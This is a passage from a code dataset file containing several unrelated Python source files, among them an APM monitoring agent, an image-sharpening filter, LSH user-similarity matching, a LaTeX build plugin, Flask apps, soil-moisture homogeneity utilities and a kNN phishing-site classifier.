VERIFY_SSL_CERT = False\n ENDPOINT = 'https://interface.richapm.com/datareceiving/pluginsupdata'\n ENCODE = 'UTF-8'\n\n HEADER = {\n 'appkey': None,\n 'protocolversion': 'V1.0.0',\n 'appversion': 'V1.0.0',\n 'reqsn': '111111',\n 'business': 'plugins',\n 'timestamp': None,\n 'gzip-encoding': '',\n 'Content-Type': 'application/json;charset=utf-8',\n 'md5key': ''\n }\n\n BODY = {\n 'host': socket.gethostname(),\n 'pid': os.getpid(),\n 'duration': None,\n 'components': None\n }\n\n def __init__(self, key, endpoint=None, wake_interval=60):\n self.key = key.encode(self.ENCODE) if key else None\n self.wake_interval = wake_interval\n self.endpoint = endpoint or self.ENDPOINT\n self.components = None\n\n def _md5(self, *fields):\n md5 = hashlib.md5()\n for field in fields:\n md5.update(str(field))\n return md5.hexdigest()\n\n @property\n def header(self):\n self.HEADER['appkey'] = self.key\n self.HEADER['timestamp'] = int(time.time())\n self.HEADER['md5key'] = self._md5(\n self.key,\n self.HEADER['protocolversion'],\n self.HEADER['appversion'],\n self.HEADER['reqsn'],\n self.HEADER['business'],\n self.HEADER['timestamp'],\n self.HEADER['gzip-encoding'],\n self.HASHKEY\n )\n return self.HEADER\n\n @property\n def body(self):\n self.BODY['duration'] = self.wake_interval\n self.BODY['components'] = self.components\n\n return json.dumps(self.BODY,\n ensure_ascii=False,\n encoding=\"utf-8\")\n\n @property\n def timeout(self):\n return self.TIMEOUT\n\n @property\n def verify(self):\n return self.VERIFY_SSL_CERT\n\n @property\n def ptoxies(self):\n return self.PROXIES\n\n\nclass thread_publish(threading.Thread):\n def __init__(self, key, endpoint, msg_queue):\n threading.Thread.__init__(self)\n self.msg_queue = msg_queue\n self.context = Context(key, endpoint)\n self.publish_queue = Queue.Queue(0)\n self.set_timer = None\n\n def send_timeout_msg(self):\n self.msg_queue.put((THREAD_TIMEOUT, None))\n\n def set_timeout_msg(self):\n if not self.set_timer or not self.set_timer.isAlive():\n self.timer = threading.Timer(TIMEOUT, self.send_timeout_msg)\n self.timer.start()\n\n def send_data(self):\n metrics = 0\n components = list()\n\n while self.publish_queue.qsize():\n component = self.publish_queue.get()\n components.append(component)\n metrics += len(component['metrics'].keys())\n if metrics >= MAX_METRICS_PER_REQUEST:\n SendComponents(self.context, components, metrics)\n components = list()\n metrics = 0\n\n # if remain\n if metrics:\n SendComponents(self.context, components, metrics)\n\n def run(self):\n LOGGER.info('Publish Thread Start.')\n\n while True:\n cmd, data = self.msg_queue.get()\n\n if cmd == THREAD_TIMEOUT:\n LOGGER.debug('Get THREAD_TIMEOUT message.')\n self.send_data()\n\n elif cmd == THREAD_TASK:\n LOGGER.debug('Get THREAD_TASK message.')\n self.publish_queue.put(data)\n self.set_timeout_msg()\n\n elif cmd == THREAD_EXIT:\n LOGGER.debug('Get THREAD_EXIT message.')\n self.send_data()\n break\n\n else:\n LOGGER.warning('Unknown command: %s', cmd)\n\n LOGGER.info('Publish Thread Exit.')\n","sub_path":"pluginsAgent/RichAPM/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312645581","text":"import cupy as cp\nimport numpy as np\n\nfrom cupyimg.scipy.ndimage.filters import gaussian_filter\nfrom .. import img_as_float\n\n\ndef _unsharp_mask_single_channel(image, radius, amount, vrange):\n \"\"\"Single channel implementation of the unsharp masking filter.\"\"\"\n\n blurred = gaussian_filter(image, sigma=radius, mode=\"reflect\")\n\n result = image + (image - blurred) * amount\n if vrange is not None:\n return cp.clip(result, vrange[0], vrange[1], out=result)\n return result\n\n\ndef unsharp_mask(\n image, radius=1.0, amount=1.0, multichannel=False, preserve_range=False\n):\n \"\"\"Unsharp masking filter.\n\n The sharp details are identified as the difference between the original\n image and its blurred version. These details are then scaled, and added\n back to the original image.\n\n Parameters\n ----------\n image : [P, ..., ]M[, N][, C] ndarray\n Input image.\n radius : scalar or sequence of scalars, optional\n If a scalar is given, then its value is used for all dimensions.\n If sequence is given, then there must be exactly one radius\n for each dimension except the last dimension for multichannel images.\n Note that 0 radius means no blurring, and negative values are\n not allowed.\n amount : scalar, optional\n The details will be amplified with this factor. The factor could be 0\n or negative. Typically, it is a small positive number, e.g. 1.0.\n multichannel : bool, optional\n If True, the last ``image`` dimension is considered as a color channel,\n otherwise as spatial. Color channels are processed individually.\n preserve_range : bool, optional\n Whether to keep the original range of values. Otherwise, the input\n image is converted according to the conventions of ``img_as_float``.\n Also see https://scikit-image.org/docs/dev/user_guide/data_types.html\n\n Returns\n -------\n output : [P, ..., ]M[, N][, C] ndarray of float\n Image with unsharp mask applied.\n\n Notes\n -----\n Unsharp masking is an image sharpening technique. It is a linear image\n operation, and numerically stable, unlike deconvolution which is an\n ill-posed problem. Because of this stability, it is often\n preferred over deconvolution.\n\n The main idea is as follows: sharp details are identified as the\n difference between the original image and its blurred version.\n These details are added back to the original image after a scaling step:\n\n enhanced image = original + amount * (original - blurred)\n\n When applying this filter to several color layers independently,\n color bleeding may occur. More visually pleasing result can be\n achieved by processing only the brightness/lightness/intensity\n channel in a suitable color space such as HSV, HSL, YUV, or YCbCr.\n\n Unsharp masking is described in most introductory digital image\n processing books. This implementation is based on [1]_.\n\n Examples\n --------\n >>> import cupy as cp\n >>> array = cp.ones(shape=(5,5), dtype=np.uint8)*100\n >>> array[2,2] = 120\n >>> array\n array([[100, 100, 100, 100, 100],\n [100, 100, 100, 100, 100],\n [100, 100, 120, 100, 100],\n [100, 100, 100, 100, 100],\n [100, 100, 100, 100, 100]], dtype=uint8)\n >>> cp.around(unsharp_mask(array, radius=0.5, amount=2),2)\n array([[0.39, 0.39, 0.39, 0.39, 0.39],\n [0.39, 0.39, 0.38, 0.39, 0.39],\n [0.39, 0.38, 0.53, 0.38, 0.39],\n [0.39, 0.39, 0.38, 0.39, 0.39],\n [0.39, 0.39, 0.39, 0.39, 0.39]])\n\n >>> array = cp.ones(shape=(5,5), dtype=np.int8)*100\n >>> array[2,2] = 127\n >>> cp.around(unsharp_mask(array, radius=0.5, amount=2),2)\n array([[0.79, 0.79, 0.79, 0.79, 0.79],\n [0.79, 0.78, 0.75, 0.78, 0.79],\n [0.79, 0.75, 1. , 0.75, 0.79],\n [0.79, 0.78, 0.75, 0.78, 0.79],\n [0.79, 0.79, 0.79, 0.79, 0.79]])\n\n >>> cp.around(unsharp_mask(array, radius=0.5, amount=2, preserve_range=True), 2)\n array([[100. , 100. , 99.99, 100. , 100. ],\n [100. , 99.39, 95.48, 99.39, 100. ],\n [ 99.99, 95.48, 147.59, 95.48, 99.99],\n [100. , 99.39, 95.48, 99.39, 100. ],\n [100. , 100. , 99.99, 100. , 100. ]])\n\n\n References\n ----------\n .. [1] Maria Petrou, Costas Petrou\n \"Image Processing: The Fundamentals\", (2010), ed ii., page 357,\n ISBN 13: 9781119994398 :DOI:`10.1002/9781119994398`\n .. [2] Wikipedia. Unsharp masking\n https://en.wikipedia.org/wiki/Unsharp_masking\n\n \"\"\"\n vrange = None # Range for valid values; used for clipping.\n if preserve_range:\n fimg = image.astype(np.float64)\n else:\n fimg = img_as_float(image)\n negative = cp.any(fimg < 0)\n if negative:\n vrange = [-1.0, 1.0]\n else:\n vrange = [0.0, 1.0]\n\n if multichannel:\n result = cp.empty_like(fimg, dtype=np.float64)\n for channel in range(image.shape[-1]):\n result[..., channel] = _unsharp_mask_single_channel(\n fimg[..., channel], radius, amount, vrange\n )\n return result\n else:\n return _unsharp_mask_single_channel(fimg, radius, amount, vrange)\n","sub_path":"cupyimg/skimage/filters/_unsharp_mask.py","file_name":"_unsharp_mask.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"132022618","text":"import pandas as pd\nimport logging\nfrom datasketch import MinHash, MinHashLSH\nimport time\nimport csv\nimport glob\nimport ntpath\nfrom multiprocessing import Process\n\n# read all data files at once\ndatafiles = glob.glob(\"data/*\")\n\n# This is the similarity threshold\nthreshold = 0.5\n\n# print every x rows\nrowprinter = 5000\n\n# jaccard similarity calculator\ndef get_jaccard_similarity(listA, listB):\n return float(len(set(listA).intersection(set(listB)))) / float(len(set(listA).union(set(listB))))\n\n# sigMat generator\ndef sig_matrix(data, fname):\n sigMat = []\n for rownum in range(len(data)):\n # The user_id is not the same as the rownum\n user_id = data.iloc[rownum][\"device_id\"]\n\n # Get the positions for user_id\n positions = set(data.iloc[rownum][\"timespace\"].split(\",\"))\n\n # Generate the MinHash column for the user's positions\n m = MinHash(num_perm=100)\n\n for time_space_box in positions:\n m.update(time_space_box.encode('utf8'))\n\n # Add the signature column of the user into the main signature matrix\n sigMat.append(m)\n\n # Display the progress of building the signature matrix\n if rownum % rowprinter == 0:\n print(\"%-22s sigmat gen at row: %s\" % (fname, rownum))\n return sigMat\n\n# lsh runner\ndef run_lsh(sigMat, data, fname):\n lsh = MinHashLSH(threshold=threshold, num_perm=100)\n\n for rownum in range(len(sigMat)):\n # For each user generate the lsh signature\n user_id = data.iloc[rownum][\"device_id\"]\n lsh.insert(user_id, sigMat[rownum])\n\n # Display the progress of building LSH\n if rownum % rowprinter == 0:\n print(\"%-22s LSH calc at row: %s\" % (fname, rownum))\n\n return lsh\n\n# file runner\ndef finder(datafile):\n print(\"%s: starting to process\" % datafile)\n totstart = time.time()\n fname = ntpath.basename(datafile)\n\n # create logger to write output\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n handler = logging.FileHandler('results/%s' % fname)\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('%(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n # load data\n start = time.time()\n data = pd.read_csv(datafile, quotechar='\"', delimiter=\";\")\n print(\"%-22s loaded -- %s sec\" % (fname, str(time.time() - start)))\n\n # generate signature matrix\n start = time.time()\n print(\"%-22s start sigmat\" % fname)\n sigMat = sig_matrix(data, fname)\n print(\"%-22s sigmat done -- %s sec\" % (fname, str(time.time() - start)))\n\n start = time.time()\n print(\"%-22s start LSH\" % fname)\n lsh = run_lsh(sigMat, data, fname)\n print(\"%-22s LSH done -- %s sec\" % (fname, str(time.time() - start)))\n\n # Check the first # users\n number_of_users_to_check = len(sigMat)\n\n start = time.time()\n print(\"%-22s writing results\" % fname)\n\n for rownum in range(number_of_users_to_check):\n\n # Get the details of the user (user_id, positions)\n user_id = data.iloc[rownum][\"device_id\"]\n positions_query = data.iloc[rownum][\"timespace\"].split(\",\")\n result = sorted(lsh.query(sigMat[rownum]))\n\n # Bruteforce to validate the generated candidates for the user\n for us_id in result:\n # point_locations contains a list of locations for us_id\n point_locations = data.loc[data[\"device_id\"] == us_id][\"timespace\"].iloc[0].split(\",\")\n\n sim = get_jaccard_similarity(positions_query, point_locations)\n if threshold < sim and user_id != us_id:\n logger.info(\"%s,%s,%s\" % (user_id, us_id, sim))\n\n # Display the progress of building LSH\n if rownum % rowprinter == 0:\n print(\"%-22s LSH display at row: %s\" % (fname, rownum))\n\n print(\"%-22s results done -- %s sec\" % (fname, str(time.time() - start)))\n print(\"%-22s total time -- %s sec\" % (fname, str(time.time() - totstart)))\n\n# use multiple processes\nstarter = time.time()\nprocesslist = []\nfor d in datafiles:\n p = Process(target=finder, args=(d,))\n processlist.append(p)\n\nfor p in processlist:\n p.start()\n\nfor p in processlist:\n p.join()\n\nprint(\"Total time: %s\" % str(time.time() - starter))\n","sub_path":"main_lsh.py","file_name":"main_lsh.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"276905103","text":"'''\nLatex build system.\n\nChange ``documentViewerCommand`` to your desired pdf viewer.\n'''\nimport pytext\nfrom pytext import APP\nimport pygments.lexer\nimport subprocess\nimport os\n\ndocumentViewerCommand = 'evince'\n\ndef _InitPyTextPlugin():\n APP.AddBuildSystem('Latex', CompileLatex)\n\ndef CompileLatex():\n language = APP.Tabbed.SelectedTab.Language\n if not pytext.utils.LanguageEqual(language, 'latex'):\n return\n\n name, ext = os.path.splitext(APP.Tabbed.SelectedTab.Path)\n\n latexmk = subprocess.Popen(['latexmk', '-pdf', name],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n latexmk.communicate()\n\n rubberInfo = subprocess.Popen(['rubber-info', name],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = rubberInfo.communicate()\n\n if len(stdout) > 0 or len(stderr) > 0:\n APP.AddTabFromBuildOutput(stdout + stderr)\n else:\n if documentViewerCommand != None:\n pdf = os.path.basename(name) + '.pdf'\n\n try:\n subprocess.Popen([documentViewerCommand, pdf])\n except:\n pass\n\n return True","sub_path":"plugins/buildlatex.py","file_name":"buildlatex.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"567214870","text":"from __future__ import print_function\r\nimport sys\r\n\r\nfrom flask import Flask, render_template, request\r\napp = Flask(__name__)\r\n\r\n\r\ntypes = [\r\n{'code': \"airport\", 'val': \"Airports\"},\r\n{'code': \"amusement_park\", 'val': \"Amusement Parks\"},\r\n{'code': \"aquarium\", 'val': \"Aquariums\"},\r\n{'code': \"art_gallery\", 'val': \"Art Galleries\"},\r\n{'code': \"bakery\", 'val': \"Bakeries\"},\r\n{'code': \"bar\", 'val': \"Bars\"},\r\n{'code': \"beauty_salon\", 'val': \"Beauty Salons\"},\r\n{'code': \"book_store\", 'val': \"Book Stores\"},\r\n{'code': \"bowling_alley\", 'val': \"Bowling Allies\"},\r\n{'code': \"bus_station\", 'val': \"Bus Stations\"},\r\n{'code': \"cafe\", 'val': \"Cafes\"},\r\n{'code': \"casino\", 'val': \"Casinos\"},\r\n{'code': \"clothing_store\", 'val': \"Clothing Stores\"},\r\n{'code': \"florist\", 'val': \"Florists\"},\r\n{'code': \"gym\", 'val': \"Gyms\"},\r\n{'code': \"hindu_temple\", 'val': \"Hindu Temples\"},\r\n{'code': \"hospital\", 'val': \"Hospitals\"},\r\n{'code': \"jewelry_store\", 'val': \"Jewelry Stores\"},\r\n{'code': \"laundry\", 'val': \"Laundries\"},\r\n{'code': \"library\", 'val': \"Libraries\"},\r\n{'code': \"liquor_store\", 'val': \"Liquor Stores\"},\r\n{'code': \"mosque\", 'val': \"Mosques\"},\r\n{'code': \"movie_theater\", 'val': \"Movie Theaters\"},\r\n{'code': \"museum\", 'val': \"Museums\"},\r\n{'code': \"night_club\", 'val': \"Night Clubs\"},\r\n{'code': \"park\", 'val': \"Parks\"},\r\n{'code': \"restaurant\", 'val': \"Restaurants\"},\r\n{'code': \"school\", 'val': \"Schools\"},\r\n{'code': \"shoe_store\", 'val': \"Shoe Stores\"},\r\n{'code': \"shopping_mall\", 'val': \"Shopping Malls\"},\r\n{'code': \"spa\", 'val': \"Spas\"},\r\n{'code': \"stadium\", 'val': \"Stadiums\"},\r\n{'code': \"store\", 'val': \"Stores\"},\r\n{'code': \"subway_station\", 'val': \"Subway Stations\"},\r\n{'code': \"train_station\", 'val': \"Train Stations\"},\r\n{'code': \"university\", 'val': \"Universities\"},\r\n{'code': \"zoo\", 'val': \"Zoos\"}\r\n];\r\n\r\n\r\n\r\n@app.route(\"/\")\r\ndef init():\r\n return render_template(\"main.html\", types=types)\r\n\r\n@app.route(\"/result\", methods=['POST'])\r\ndef result():\r\n\r\n\tif request.method == 'POST':\r\n\r\n\t\ttotal = int(request.form.get('total'));\r\n\t\titems = [];\r\n\r\n\t\tfor i in range(int(total)):\r\n\t\t\titems.append(request.form.get('item_' + str(i)))\r\n\r\n\t\ttotal_types = int(request.form.get('total_types'));\r\n\r\n\t\ttypes = [];\r\n\t\tfor i in range(int(total_types)):\r\n\t\t\ttypes.append(request.form.get('type_' + str(i)));\r\n\r\n\t\treturn render_template(\"result.html\", total = total, items = items, types = types, total_types = total_types)\r\n\r\n@app.route('/', methods=['POST'])\r\ndef submit():\r\n\r\n\r\n return render_template(\"result.html\")\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"588379301","text":"#!/usr/bin/python3\n\"\"\" New view for Amenities objects that handles all default\nRESTFul API actions\"\"\"\n\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.amenity import Amenity\nfrom flask import jsonify, request, make_response, abort\n\n\n@app_views.route('/amenities', methods=['GET'], strict_slashes=False)\ndef amenities():\n \"\"\" Return all the elements of Amenity\"\"\"\n all_elements = storage.all(Amenity)\n states_list = []\n for states in all_elements.values():\n states_list.append(states.to_dict())\n return jsonify(states_list)\n\n\n@app_views.route('/amenities/',\n methods=['GET'], strict_slashes=False)\ndef amenities_id(amenity_id):\n \"\"\" Return one element of Amenity matched with id\"\"\"\n object = storage.get(Amenity, amenity_id)\n if object is None:\n abort(404)\n return jsonify(object.to_dict())\n\n\n@app_views.route('/amenities/',\n methods=['DELETE'], strict_slashes=False)\ndef amenities_id_delete(amenity_id):\n \"\"\" Delete one element of Amenity matched with id\"\"\"\n object = storage.get(Amenity, amenity_id)\n if object is None:\n abort(404)\n else:\n storage.delete(object)\n storage.save()\n return {}, 200\n\n\n@app_views.route('/amenities', methods=['POST'], strict_slashes=False)\ndef create_amenities():\n \"\"\" Create a new Amenity\"\"\"\n if not request.get_json():\n abort(400, 'Not a JSON')\n else:\n variable = request.get_json(request.data)\n if 'name' in variable.keys():\n instance = Amenity(name=variable['name'])\n storage.new(instance)\n storage.save()\n else:\n abort(400, 'Missing name')\n return make_response(jsonify(instance.to_dict()), 201)\n\n\n@app_views.route('amenities/',\n methods=['PUT'], strict_slashes=False)\ndef update_amenities(amenity_id):\n \"\"\" one element of Amenity matched with id\"\"\"\n object = storage.get(Amenity, amenity_id)\n if object is None:\n abort(404)\n else:\n if not request.get_json():\n abort(400, 'Not a JSON')\n else:\n variable = request.get_json(request.data)\n if 'name' in variable.keys():\n object.name = variable['name']\n storage.save()\n else:\n abort(400, 'Missing name')\n return jsonify(object.to_dict()), 200\n","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"369682843","text":"# -*- coding: utf-8 -*-\n\n\nfrom scipy import stats\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom netCDF4 import date2num\nfrom scipy import io\nimport os\nfrom datetime import datetime\n\n\n\ndef cci_extract(_string):\n cont = _string.upper().split('_')\n if len(cont) == 3:\n return {'prefix': cont[0], 'version': cont[1], 'type': cont[2], 'adjust': None}\n elif len(cont) == 4 and cont[3] == 'ADJUSTED':\n return {'prefix': cont[0], 'version': cont[1], 'type': cont[2], 'adjust': cont[3]}\n else:\n raise Exception('Unknown Product')\n\ndef cci_string_combine(info):\n if info['adjust']:\n return \"_\".join([info.get(key) for key in ['prefix', 'version', 'type','adjust']])\n else:\n return \"_\".join([info.get(key) for key in ['prefix', 'version', 'type']])\n\ndef split(el, n):\n '''\n Split list of cells in n approx. equal parts for multiprocessing\n :param el: list of elements to split\n :param n: number of lists to split input up into\n :return: list\n '''\n k, m = divmod(len(el), n)\n return (el[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in xrange(n))\n\n\ndef create_workfolder(path):\n # type: (str) -> str\n i = 1\n while os.path.exists(os.path.join(path, 'v' + str(i))):\n i += 1\n else:\n os.makedirs(os.path.join(path, 'v' + str(i)))\n\n workfolder = os.path.join(path, 'v' + str(i))\n print('Create workfolder: %s' % str(workfolder))\n\n return workfolder\n\n\ndef regress(data, testdata_col_name, refdata_col_name):\n '''\n Perform regression of column refdata on column testdata\n '''\n dataframe = data.copy()\n out = dataframe[refdata_col_name]\n dataframe = dataframe.dropna()\n R, pval = stats.pearsonr(dataframe[refdata_col_name], dataframe[testdata_col_name]) # Correlation between Refdata and Testdata\n\n\n if R < 0 or np.isnan(R):\n ress = [np.nan]\n return out, R, pval, ress\n\n testdata = dataframe[testdata_col_name].values\n refdata = dataframe[refdata_col_name].values\n refdata_ones = np.vstack([refdata, np.ones(len(refdata))]).T\n\n ress = np.linalg.lstsq(refdata_ones, testdata)[0][::-1]\n dataframe['ones'] = 1\n xm = np.matrix(dataframe.as_matrix(columns=['ones', refdata_col_name]))\n out = np.dot(xm, np.matrix(ress).transpose())\n\n return pd.Series(index=dataframe.index, data=np.squeeze(np.asarray(out))), R, pval, ress\n\n\ndef datetime2matlabdn(dt):\n ord = dt.toordinal()\n mdn = dt + timedelta(days=366)\n frac = (dt - datetime(dt.year, dt.month, dt.day, 0, 0, 0)).seconds / (24.0 * 60.0 * 60.0)\n return mdn.toordinal() + frac\n\n\ndef dates_to_num(dates):\n calendar = 'standard'\n units = 'days since 1900-01-01 00:00:00'\n timestamps=[]\n for date in dates:\n timestamps.append(pd.Timestamp(date).to_datetime())\n\n return np.sort(date2num(timestamps, units, calendar))\n\n\ndef dt_to_dec(dt):\n # Datetime object to decimal year\n startyear = datetime(dt.year, 1, 1)\n endyear = startyear.replace(year=dt.year + 1)\n return dt.year + ((dt - startyear).total_seconds() / float((endyear - startyear).total_seconds()))\n\n\ndef save_as_mat(path, gpi, test_prod, ref_prod, anomaly, timeframe):\n\n # type: (int) -> None\n\n #Saves the SM data for active timeframe for testproduct and refproduct to the selected path\n # format: *gpi*.mat\n\n\n test_obj = HomogTest(test_prod,\n ref_prod,\n 0.01,\n anomaly)\n\n print('Exporting Testdata and Referencedata to .mat')\n exp_data = test_obj.read_gpi(gpi,\n test_obj.range[0],\n test_obj.range[1]) # type: pd.DataFrame\n exp_data = exp_data / 100\n\n matdate = []\n for dt in exp_data['refdata'].index:\n matdate.append(datetime2matlabdn(dt))\n\n x = {'tspan': matdate,\n 'sm': exp_data['refdata'].values}\n\n y = {'tspan': matdate,\n 'sm': exp_data['testdata'].values}\n\n timeframe = [datetime2matlabdn(timeframe[0]),\n datetime2matlabdn(timeframe[1])]\n\n\n data_dict = {'X': x, 'Y': y, 'timeframe': timeframe}\n io.savemat(os.path.join(path, str(gpi)),\n data_dict, oned_as='column')\n\n\n\ndef timeseries_stats(dataframe, breaktime, timeframe, return_ts=False):\n #TODO: Move this somewhere\n\n df = dataframe.copy(True)\n data_dict = {}\n breaktime_next = breaktime + pd.DateOffset(1)\n # Mean of adjusted testdata after breaktime\n mean_after_break_testdata = np.nanmean(df.loc[breaktime_next:timeframe[1], 'testdata'].values)\n # Mean of adjusted testdata before breaktime\n mean_before_break_testdata = np.nanmean(df.loc[timeframe[0]:breaktime, 'testdata'].values)\n # Mean of unadjusted testdata after break\n mean_after_break_original = np.nanmean(df.loc[breaktime_next:timeframe[1], 'testdata_original'].values)\n # Mean of testdata before break\n mean_before_break_original = np.nanmean(df.loc[timeframe[0]:breaktime, 'testdata_original'].values)\n # Mean of refdata after break\n mean_after_break_refdata_original = np.nanmean(df.loc[breaktime_next:timeframe[1], 'refdata_original'].values)\n # Mean of refdata before break\n mean_before_break_refdata_original = np.nanmean(df.loc[timeframe[0]:breaktime, 'refdata_original'].values)\n # Mean of refdata after break\n if 'refdata' in dataframe.columns.values:\n mean_after_break_refdata= np.nanmean(df.loc[breaktime_next:timeframe[1], 'refdata'].values)\n # Mean of refdata before break\n mean_before_break_refdata = np.nanmean(df.loc[timeframe[0]:breaktime, 'refdata'].values)\n\n\n # Variance of adjusted testdata\n var_after_break_testdata = np.nanvar(df.loc[breaktime_next:timeframe[1], 'testdata'].values)\n var_before_break_testdata = np.nanvar(df.loc[timeframe[0]:breaktime, 'testdata'].values)\n # Variance of unadjusted testdata\n var_after_break_original = np.nanvar(df.loc[breaktime_next:timeframe[1], 'testdata_original'].values)\n var_before_break_original = np.nanvar(df.loc[timeframe[0]:breaktime, 'testdata_original'].values)\n # Variance of original refdata after break\n var_after_break_refdata_original = np.nanvar(df.loc[breaktime_next:timeframe[1], 'refdata_original'].values)\n var_before_break_refdata_original = np.nanvar(df.loc[timeframe[0]:breaktime, 'refdata_original'].values)\n if 'refdata' in dataframe.columns.values:\n # Variance of refdata after break\n var_after_break_refdata = np.nanvar(df.loc[breaktime_next:timeframe[1], 'refdata'].values)\n var_before_break_refdata = np.nanvar(df.loc[timeframe[0]:breaktime, 'refdata'].values)\n\n\n\n\n data_dict['mean_after_break_testdata'] = mean_after_break_testdata\n data_dict['mean_before_break_testdata'] = mean_before_break_testdata\n data_dict['mean_after_break_original'] = mean_after_break_original\n data_dict['mean_before_break_original'] = mean_before_break_original\n data_dict['mean_after_break_refdata_original'] = mean_after_break_refdata_original\n data_dict['mean_before_break_refdata_original'] = mean_before_break_refdata_original\n if 'refdata' in dataframe.columns.values:\n data_dict['mean_after_break_refdata'] = mean_after_break_refdata\n data_dict['mean_before_break_refdata'] = mean_before_break_refdata\n\n data_dict['var_after_break_testdata'] = var_after_break_testdata\n data_dict['var_before_break_testdata'] = var_before_break_testdata\n data_dict['var_after_break_original'] = var_after_break_original\n data_dict['var_before_break_original'] = var_before_break_original\n data_dict['var_after_break_refdata_original'] = var_after_break_refdata_original\n data_dict['var_before_break_refdata_original'] = var_before_break_refdata_original\n if 'refdata' in dataframe.columns.values:\n data_dict['var_after_break_refdata'] = var_after_break_refdata\n data_dict['var_before_break_refdata'] = var_before_break_refdata\n\n\n if return_ts:\n Q_adj_ref_after_break = df.loc[breaktime_next:timeframe[1], 'testdata'].values - \\\n df.loc[breaktime_next:timeframe[1], 'refdata_original'].values\n Q_orig_ref_after_break = df.loc[breaktime_next:timeframe[1], 'testdata_original'].values - \\\n df.loc[breaktime_next:timeframe[1], 'refdata_original'].values\n else:\n df = False\n\n return df, data_dict\n\n\ndef create_testresults_col(frame):\n '''\n Takes a data frame and uses the columns h_MEAN and h_VAR to create a combined\n 'test results' column with values Nan, 0, 1, 2 and 3\n\n Parameters\n ----------\n frame : pandas.DataFrame\n Input Frame of test results\n Returns\n -------\n test_results : pandas.Series\n Series of combined test results\n\n '''\n frame = frame.copy()\n\n tested_gpis = frame[['h_MEAN', 'h_VAR']].dropna()\n hmean_gpis = frame[['h_MEAN']].dropna().loc[frame['h_MEAN'] == 1.0]\n hvar_gpis = frame[['h_VAR']].dropna().loc[frame['h_VAR'] == 1.0]\n\n index2breaks = frame[['h_MEAN', 'h_VAR']].dropna().query('h_VAR == 1.0 & h_MEAN == 1.0 ').index\n hboth_gpis = frame[['h_MEAN', 'h_VAR']].dropna().loc[index2breaks]\n\n # Classification of MEAN VAR and BOTH\n tested_gpis['test_results'] = 4.0\n tested_gpis.loc[hmean_gpis.index, 'test_results'] = 1.0\n tested_gpis.loc[hvar_gpis.index, 'test_results'] = 2.0\n tested_gpis.loc[index2breaks, 'test_results'] = 3.0\n\n frame.loc[tested_gpis.index, 'test_results'] = tested_gpis\n\n return frame[['test_results']]\n","sub_path":"ccibreakadjustment/otherfunctions.py","file_name":"otherfunctions.py","file_ext":"py","file_size_in_byte":9577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"112066636","text":"import numpy as np\nimport pandas as pd\nfrom scipy.io.arff import loadarff\nfrom sklearn import preprocessing, neighbors\nfrom sklearn.model_selection import train_test_split\n\n'''\nbased on a set of attributes of a website we want to know\nif it is a likely a phishing website or not.\n\ndata taken from \"https://archive.ics.uci.edu/ml/datasets/Phishing+Websites\"\nfor a description of dataset refer to above link\n'''\n\n# load arff file into numpy record array\n# meta is the header information(attributes,...)\ndata, meta = loadarff('phishing_sites.arff')\n# create a pandas dataframe from record array\n# it is easier to performe any action on data\n# in pandas dataframe, though here isn't much!\ndf = pd.DataFrame.from_records(data, coerce_float=True)\n# convert boolean type of columns to int\nfor col in df.columns.values:\n\tdf[col] = df[col].astype(int)\n\n# data doesn't contain missing data, just to be sure\n# drop any NaN values\ndf.dropna(inplace=True)\n\n# feature set: anything but 'Result'\nX = np.array(df.drop(['Result'], axis=1))\n# label set: 'Result' column\ny = np.array(df['Result'])\n\n# split training data from testing one\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\n# defining classifier\nclf = neighbors.KNeighborsClassifier()\n# train the classifier\nclf.fit(X_train, y_train)\n\naccuracy = clf.score(X_test, y_test)\n\nprint(\"\\nAccuracy: {}\\n\" .format(accuracy))\n\n# a prediction example:\nsample_site_measures = np.array([-1,0,1,1,1,-1,-1,-1,1,1,1,1,-1,-1,0,-1,1,1,0,1,1,1,1,-1,1,-1,-1,-1,1,1])\nsample_site_measures = sample_site_measures.reshape(1, -1)\n\nresult = clf.predict(sample_site_measures)\nif result == 1:\n\tresult = 'Safe'\nelif result == -1:\n\tresult = 'Unsafe'\n\nprint(\"\\nPrediction for Site Measures {}\\n is {}\" .format(sample_site_measures, result))","sub_path":"classification/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"267388067","text":"import os\nimport getpass\n\nfrom multiprocessing import Condition\n\n\nfrom xii import error, util, need\nfrom xii.validator import Dict, String, RequiredKey, Key, VariableKeys\n\nfrom xii.components.node import NodeAttribute\n\n\n# sshmount:\n# mount ssh folder from spawned instance to host name\n# by:\n# spawning:\n# - Generate ssh private key (unless generate-key: false)\n# - Copy private key to instance and overwrite $HOME/.ssh/id_rsa.pub\n# - Add public key to $HOME/.ssh/know_hosts on the spawning host\n# start:\n# - Connect to instance using the default connection\n# - running: sshmount {hostuser}@{host}:{hostfilepath} {instancefilepath}\n# - check returncode\n# stop:\n# - Connect to instance using default connection\n# - running: 